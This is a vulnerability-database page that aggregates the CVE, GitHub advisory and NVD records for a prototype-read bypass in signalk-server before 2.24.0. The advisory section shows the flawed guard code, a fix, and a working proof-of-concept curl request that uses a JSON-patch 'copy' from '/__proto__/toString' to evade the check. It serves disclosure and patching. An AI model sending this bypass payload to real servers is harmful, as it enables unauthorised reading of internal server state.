CVE-2026-35038 (GCVE-0-2026-35038)
Vulnerability from cvelistv5 – Published: 2026-04-02 16:20 – Updated: 2026-04-02 18:46
VLAI?
Title
signalk-server: Arbitrary Prototype Read via `from` Field Bypass
Summary
Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0, there is an arbitrary prototype read vulnerability via `from` field bypass. This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should. This issue has been patched in version 2.24.0.
Severity ?
CWE
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SignalK | signalk-server |
Affected:
< 2.24.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-35038",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T18:46:22.506545Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T18:46:36.895Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "signalk-server",
"vendor": "SignalK",
"versions": [
{
"status": "affected",
"version": "\u003c 2.24.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0, there is an arbitrary prototype read vulnerability via `from` field bypass. This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should. This issue has been patched in version 2.24.0."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.1,
"baseSeverity": "LOW",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T16:20:17.750Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234"
},
{
"name": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0"
}
],
"source": {
"advisory": "GHSA-qh3j-mrg8-f234",
"discovery": "UNKNOWN"
},
"title": "signalk-server: Arbitrary Prototype Read via `from` Field Bypass"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-35038",
"datePublished": "2026-04-02T16:20:17.750Z",
"dateReserved": "2026-03-31T21:06:06.428Z",
"dateUpdated": "2026-04-02T18:46:36.895Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-35038",
"date": "2026-04-22",
"epss": "0.00058",
"percentile": "0.18178"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-35038\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-02T17:16:27.163\",\"lastModified\":\"2026-04-06T14:54:52.377\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0, there is an arbitrary prototype read vulnerability via `from` field bypass. This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should. This issue has been patched in version 2.24.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-125\"},{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.24.0\",\"matchCriteriaId\":\"64F9BA25-5552-4477-84F9-83E71B2CA56F\"}]}]}],\"references\":[{\"url\":\"https://github.com/SignalK/signalk-server/releases/tag/v2.24.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}"
}
}
GHSA-QH3J-MRG8-F234
Vulnerability from github – Published: 2026-04-03 04:04 – Updated: 2026-04-03 04:04
VLAI?
Summary
Signal K Server: Arbitrary Prototype Read via `from` Field Bypass
Details
Summary
The /signalk/v1/applicationData/... JSON-patch endpoint allows users to modify stored application data. To prevent Prototype Pollution, the developers implemented an isPrototypePollutionPath guard. However, this guard only checks the path property of incoming JSON-patch objects. It completely fails to check the from property. Because JSON-patch operations like copy and move extract data using the from property path, an attacker can construct a payload where from targets /proto/someProperty, completely evading the security check and successfully executing an Arbitrary Prototype Read.
While this does not allow arbitrary code execution (as the destination path remains protected from proto), it does allow a user to exfiltrate internal Node functions and prototype state into their own application data.
Vulnerability Root Cause
File: src/interfaces/applicationData.js (Lines 48-57)
const DANGEROUS_PATH_SEGMENTS = ['__proto__', 'constructor', 'prototype']
function isPrototypePollutionPath(pathString) {
const segments = pathString.split(/[./]/)
return segments.some((seg) => DANGEROUS_PATH_SEGMENTS.includes(seg))
}
function hasPrototypePollutionPatch(patches) {
return patches.some(
// [!VULNERABLE] Only checks patch.path, completely ignores patch.from
(patch) => patch.path && isPrototypePollutionPath(patch.path)
)
}
At Line 201:
if (hasPrototypePollutionPatch(req.body)) {
res.status(400).send('invalid patch path')
return
}
jsonpatch.apply(applicationData, req.body) // jsonpatch natively resolves 'from'
Proof of Concept (PoC)
Verify the Developer Guard Works (The Blocked Payload):
curl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '[{"op": "add", "path": "/__proto__/polluted", "value": "hacked"}]'
Result: 400 Bad Request - invalid patch path
Execute the Bypass (The Malicious Payload):
curl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '[{"op": "copy", "from": "/__proto__/toString", "path": "/stolen"}]'
Result: 200 OK - ApplicationData saved The security guard is bypassed and the json-patch engine successfully copies the proto internal function reference.
Security Impact
This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should.
Fixing Arbitrary Prototype Read
The hasPrototypePollutionPatch function must be updated to inspect ALL path-related fields:
function hasPrototypePollutionPatch(patches) {
return patches.some(
(patch) =>
(patch.path && isPrototypePollutionPath(patch.path)) ||
(patch.from && isPrototypePollutionPath(patch.from))
)
}
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "signalk-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.24.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35038"
],
"database_specific": {
"cwe_ids": [
"CWE-125",
"CWE-20",
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T04:04:22Z",
"nvd_published_at": "2026-04-02T17:16:27Z",
"severity": "LOW"
},
"details": "## Summary \n\nThe /signalk/v1/applicationData/... JSON-patch endpoint allows users to modify stored application data. To prevent Prototype Pollution, the developers implemented an isPrototypePollutionPath guard. However, this guard only checks the path property of incoming JSON-patch objects. It completely fails to check the from property. Because JSON-patch operations like copy and move extract data using the from property path, an attacker can construct a payload where from targets /__proto__/someProperty, completely evading the security check and successfully executing an Arbitrary Prototype Read.\n\nWhile this does not allow arbitrary code execution (as the destination path remains protected from __proto__), it does allow a user to exfiltrate internal Node functions and prototype state into their own application data.\n\n## Vulnerability Root Cause \n\nFile: src/interfaces/applicationData.js (Lines 48-57)\n```\nconst DANGEROUS_PATH_SEGMENTS = [\u0027__proto__\u0027, \u0027constructor\u0027, \u0027prototype\u0027]\n\nfunction isPrototypePollutionPath(pathString) {\n const segments = pathString.split(/[./]/)\n return segments.some((seg) =\u003e DANGEROUS_PATH_SEGMENTS.includes(seg))\n}\n\nfunction hasPrototypePollutionPatch(patches) {\n return patches.some(\n // [!VULNERABLE] Only checks patch.path, completely ignores patch.from\n (patch) =\u003e patch.path \u0026\u0026 isPrototypePollutionPath(patch.path) \n )\n}\n```\nAt Line 201:\n```\nif (hasPrototypePollutionPatch(req.body)) {\n res.status(400).send(\u0027invalid patch path\u0027)\n return\n}\njsonpatch.apply(applicationData, req.body) // jsonpatch natively resolves \u0027from\u0027\n\n```\n## Proof of Concept (PoC)\n\nVerify the Developer Guard Works (The Blocked Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d \u0027[{\"op\": \"add\", \"path\": \"/__proto__/polluted\", \"value\": \"hacked\"}]\u0027\n```\nResult: 400 Bad Request - invalid patch path\n\nExecute the Bypass (The Malicious Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d \u0027[{\"op\": \"copy\", \"from\": \"/__proto__/toString\", \"path\": \"/stolen\"}]\u0027\n```\nResult: 200 OK - ApplicationData saved The security guard is bypassed and the json-patch engine successfully copies the __proto__ internal function reference.\n\n\u003cimg width=\"1222\" height=\"230\" alt=\"Screenshot 2026-03-24 150440\" src=\"https://github.com/user-attachments/assets/5ae580fd-284f-4bef-adc8-31b50b8751b6\" /\u003e\n\n## Security Impact\nThis vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should.\n\n## Fixing Arbitrary Prototype Read\n\nThe hasPrototypePollutionPatch function must be updated to inspect ALL path-related fields:\n```\nfunction hasPrototypePollutionPatch(patches) {\n return patches.some(\n (patch) =\u003e \n (patch.path \u0026\u0026 isPrototypePollutionPath(patch.path)) ||\n (patch.from \u0026\u0026 isPrototypePollutionPath(patch.from))\n )\n}\n```",
"id": "GHSA-qh3j-mrg8-f234",
"modified": "2026-04-03T04:04:22Z",
"published": "2026-04-03T04:04:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35038"
},
{
"type": "PACKAGE",
"url": "https://github.com/SignalK/signalk-server"
},
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Signal K Server: Arbitrary Prototype Read via `from` Field Bypass"
}
FKIE_CVE-2026-35038
Vulnerability from fkie_nvd - Published: 2026-04-02 17:16 - Updated: 2026-04-06 14:54
Severity ?
Summary
Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0, there is an arbitrary prototype read vulnerability via `from` field bypass. This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should. This issue has been patched in version 2.24.0.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/SignalK/signalk-server/releases/tag/v2.24.0 | Product, Release Notes | |
| security-advisories@github.com | https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234 | Exploit, Mitigation, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| signalk | signal_k_server | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "64F9BA25-5552-4477-84F9-83E71B2CA56F",
"versionEndExcluding": "2.24.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0, there is an arbitrary prototype read vulnerability via `from` field bypass. This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should. This issue has been patched in version 2.24.0."
}
],
"id": "CVE-2026-35038",
"lastModified": "2026-04-06T14:54:52.377",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-02T17:16:27.163",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Release Notes"
],
"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-125"
},
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…